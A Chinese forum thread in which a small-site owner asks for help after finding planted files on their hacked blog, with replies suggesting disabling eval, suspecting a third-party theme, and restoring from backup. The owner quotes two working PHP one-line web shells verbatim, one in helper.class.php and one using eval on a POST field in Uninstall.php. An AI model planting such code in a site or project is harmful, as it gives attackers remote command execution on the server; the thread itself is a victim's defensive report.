SOS 求助，我的小站难道被针对了？

20140727 · 发表于 2017-10-26 23:15:48

昨天发现被挂了代码后，修改了后台管理员密码和后台登陆路径。今晚发现网站的根目录有个helper.class.php的文件，晚上9点半刚生成的。我看饿了下代码是

<?php $_GET[a]($_POST);?>

Gh0st · 发表于 2017-10-26 23:18:20

这个好像是一句话

20140727 · 发表于 2017-10-26 23:21:50

Gh0st 发表于 2017-10-26 23:18
这个好像是一句话

这怎么弄上来的？晕。。。不知道哪里有漏洞。。。还没堵上

20140727 · 发表于 2017-10-26 23:40:21

还有个 Uninstall.php里有
<?php @eval($_POST[finish]);?>

醉里耍大刀 · 发表于 2017-10-26 23:48:57

禁用函数eval

maro666 · 发表于 2017-10-26 23:49:14

估计你那源码里一堆洞了

20140727 · 发表于 2017-10-26 23:50:58

刚刚nginx里启用访问日志access.log准备看看有没有什么可以得情况。。。之前都把日志关了。。哎。。

20140727 · 发表于 2017-10-26 23:52:20

maro666 发表于 2017-10-26 23:49
估计你那源码里一堆洞了

什么源码?我插件一个没用，就是博客的外观皮肤用了别人的。

maro666 · 发表于 2017-10-27 10:01:05

20140727 发表于 2017-10-26 23:52
什么源码?我插件一个没用，就是博客的外观皮肤用了别人的。

皮肤里面洞才多

欧阳逍遥 · 发表于 2017-10-27 10:02:51

遍地洞啊。建议备份数据库程序重新覆盖一遍吧。

		自动登录	找回密码
密码			注册